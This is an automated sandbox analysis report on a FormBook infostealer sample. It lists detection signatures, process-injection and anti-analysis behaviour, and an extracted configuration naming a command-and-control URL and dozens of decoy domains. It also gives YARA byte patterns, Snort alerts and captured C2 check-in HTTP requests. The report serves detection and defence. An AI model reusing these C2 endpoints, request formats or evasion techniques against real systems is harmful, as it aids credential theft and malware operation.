Play interactive tour

Edit tour

Analysis Report 457b22da_by_Libranalysis

Overview

General Information

Sample Name:	457b22da_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:	412121
MD5:	457b22da77d4db093a31dd80a4b8963f
SHA1:	83dc32633108d309f6b6b50a42dc102e7375f54c
SHA256:	8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

457b22da_by_Libranalysis.exe (PID: 4120 cmdline: 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: 457B22DA77D4DB093A31DD80A4B8963F)

457b22da_by_Libranalysis.exe (PID: 5452 cmdline: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 852 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5448 cmdline: /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x76dd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x77172:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9e1f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9e592:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x82e85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xaa2a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x82971:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa9d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x82f87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xaa3a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x830ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa51f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x77b8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9efaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x81bec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa900c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x78902:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x9fd22:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x87f77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xaf397:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x8901a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x84ea9:$sqlite3step: 68 34 1C 7B E1 0x84fbc:$sqlite3step: 68 34 1C 7B E1 0xac2c9:$sqlite3step: 68 34 1C 7B E1 0xac3dc:$sqlite3step: 68 34 1C 7B E1 0x84ed8:$sqlite3text: 68 38 2A 90 C5 0x84ffd:$sqlite3text: 68 38 2A 90 C5 0xac2f8:$sqlite3text: 68 38 2A 90 C5 0xac41d:$sqlite3text: 68 38 2A 90 C5 0x84eeb:$sqlite3blob: 68 53 D8 7F 8C 0x85013:$sqlite3blob: 68 53 D8 7F 8C 0xac30b:$sqlite3blob: 68 53 D8 7F 8C 0xac433:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 457b22da_by_Libranalysis.exe PID: 4120	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 852

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 457b22da_by_Libranalysis.exe

ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: 457b22da_by_Libranalysis.exe

Joe Sandbox ML: detected

Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 457b22da_by_Libranalysis.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 457b22da_by_Libranalysis.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 457b22da_by_Libranalysis.exe, rundll32.exe

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_00C91660
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_00C91577
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04BF6FB4
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04BFA9E8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4x nop then pop ebx	4_2_00406A9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop ebx	9_2_008F6A9A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.rogegalmish.com/a8si/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: www.thepocket-onlinelesson.xyz
Source: C:\Windows\explorer.exe	DNS query: www.tracisolomon.xyz

Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1Host: www.skynetaccess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1Host: www.shirleyeluiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1Host: www.drisu-goalkeeping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1Host: www.rogegalmish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1Host: www.best-cleaner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1Host: www.omfgphil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.128.23.153 52.128.23.153

